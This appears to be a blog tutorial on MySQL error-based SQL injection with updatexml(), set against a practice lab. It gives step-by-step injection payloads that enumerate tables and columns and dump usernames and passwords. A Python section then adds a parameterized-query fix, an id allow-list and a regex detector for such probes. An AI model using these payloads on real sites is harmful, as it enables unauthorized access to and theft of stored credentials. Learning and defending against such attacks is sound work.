Basic MySQL knowledge: error-based injection with updatexml

# Introduction

The updatexml() function

updatexml(XML_document, XPath_string, new_value) takes three parameters:

The first parameter, XML_document, is a string: the XML document object to operate on, for example Doc.

The second parameter, XPath_string, is the path, a string in XPath format.

The third parameter, new_value, is a string: the value that replaces the data matched by the XPath condition.

# Error reporting principle of updatexml

The error reporting principle of updatexml() is exactly the same as that of extractvalue().

Call updatexml() in a select, and deliberately write an invalid path as the second parameter, which makes MySQL raise an XPath syntax error. When we use this, the subquery we embed in that path is executed before the error is raised, and the error message then echoes the result of that subquery back to the page. What is echoed is the content we want to view.

Note: updatexml(), like extractvalue(), only echoes 32 characters of the string, so you still need to use the substring function for longer results.

# Analysis of how an updatexml() injection is written

and 1=updatexml(1,2,3)

1. The first parameter can be anything.

2. The second parameter is concat(1,2):

   (1): 0x7e or '~', a character that is illegal in an XPath expression and guarantees the error

   (2): (select query statement), the subquery whose result we want echoed

3. The third parameter can be anything.

Example: and 1=updatexml(1,concat('~',(select database())),3)

# Case demo

Error-based injection using updatexml()

1. Determine whether the parameter is a character type or a numeric type; if it is a character type, determine how it is closed.

Throw in a single quotation mark first: the page is normal.

Throw in a double quotation mark: the page reports an error.

Take the content of the error message:

'"1"" LIMIT 0,1'

 "1"" LIMIT 0,1

The second double quote after the 1 is the one we entered (it was highlighted in red in the original screenshot).

From the error echoed by the page, it is determined that double quotation marks are used to close the parameter.

2. Get the database name

?id=1"  and updatexml(1,concat('~',(select database())),3) --+

The error message echoes the database name: security.

3. Get the data tables

?id=1" and 1=updatexml(1,concat('~',(select group_concat(table_name)from information_schema.tables where table_schema=database())),3)  --+

The tables are:

emails

referers

agents

users

4. Get all field information in the users table

?id=1" and 1=updatexml(1,concat('~',(select group_concat(column_name)from information_schema.columns where table_name='users' and table_schema=database())),3)--+

The fields are:

id

username

password

5. Dump the data (using the substring function)

?id=1" and 1=updatexml(1,concat(0x7e,(select substring(group_concat(username,'--',password),1,30)from security.users)),3) --+

If you need to see more user information, you only need to change the last two parameters of substring (the start position and the length).

The above is error-based injection for the character type. If the parameter is a numeric type, the method is the same, but there is no need to close a quote or add a comment; it can be tested directly.

For example: ?id=1 and 1=updatexml(1,concat('~',(select database())),3)
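The reason every step above works is that the page pastes the id parameter straight into the SQL text, so the closing quote and the updatexml() call become part of the statement MySQL parses. The following Python is an added example, not code from the original post: it contrasts a hypothetical vulnerable query builder with a parameterized one and an allow-list check for numeric ids, and runs a simple detector for the updatexml/extractvalue + concat payload shape over constructed access-log lines (the handler, path and log lines are all assumptions for the demonstration).

```python
import re
from urllib.parse import unquote_plus


def build_query_vulnerable(user_id: str) -> str:
    """Hypothetical vulnerable handler: the parameter is interpolated into SQL text.

    A value such as 1" and 1=updatexml(1,concat('~',(select database())),3) --
    closes the double quote, appends the updatexml() call and comments out the rest,
    which is exactly the shape of the payloads in the case demo above.
    """
    return f'SELECT username, password FROM users WHERE id="{user_id}" LIMIT 0,1'


def build_query_safe(user_id: str) -> tuple:
    """Hardened form: fixed SQL text plus a bound parameter.

    With a DB-API driver this is passed as cursor.execute(sql, params); the value is
    sent separately from the statement, so a quote or a function call inside it can
    never change what MySQL parses, and no XPath error can be provoked.
    """
    return ('SELECT username, password FROM users WHERE id=%s LIMIT 0,1', (user_id,))


def validate_id(raw: str) -> int:
    """Allow-list check for a numeric id: anything but a plain integer is rejected."""
    if not re.fullmatch(r'\d{1,10}', raw.strip()):
        raise ValueError(f'rejected id parameter: {raw!r}')
    return int(raw)


# Error-based payloads use a small vocabulary: updatexml()/extractvalue() wrapped
# around concat() and a subquery. Match that shape after URL decoding.
ERROR_BASED_RE = re.compile(
    r'\b(updatexml|extractvalue)\s*\(.*?\bconcat\s*\(',
    re.IGNORECASE | re.DOTALL,
)


def flag_request(request_line: str) -> bool:
    """True if the decoded request target of an access-log line looks like an error-based probe."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    decoded = unquote_plus(parts[1])  # '%22' -> '"', '%27' -> "'", '+' -> ' '
    return bool(ERROR_BASED_RE.search(decoded))


def scan_log(lines):
    """Return only the log lines that flag_request() considers suspicious."""
    return [line for line in lines if flag_request(line)]


# Constructed sample access-log request lines (not real traffic); the path is an assumption.
SAMPLE_LOG = [
    'GET /index.php?id=1 HTTP/1.1',
    'GET /index.php?id=1%22+and+1%3Dupdatexml(1,concat(%27~%27,(select+database())),3)+--+ HTTP/1.1',
    'GET /index.php?id=1+and+1%3Dextractvalue(1,concat(0x7e,(select+database()))) HTTP/1.1',
    'GET /search?q=concat+recipes HTTP/1.1',
]


if __name__ == '__main__':
    payload = '1" and 1=updatexml(1,concat(\'~\',(select database())),3) --'
    print('vulnerable:', build_query_vulnerable(payload))
    print('safe      :', build_query_safe(payload))
    for hit in scan_log(SAMPLE_LOG):
        print('flagged   :', hit)
```

The detector is deliberately narrow: it keys on the function-plus-concat shape rather than on the word "select", so ordinary search traffic that happens to contain "concat" is not flagged, while both the character-type and numeric-type payloads from the demo are. The real fix is the parameterized query and the numeric allow-list; the log check only tells you that someone is probing.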


Source: blog.csdn.net/m0_72755466/article/details/129787780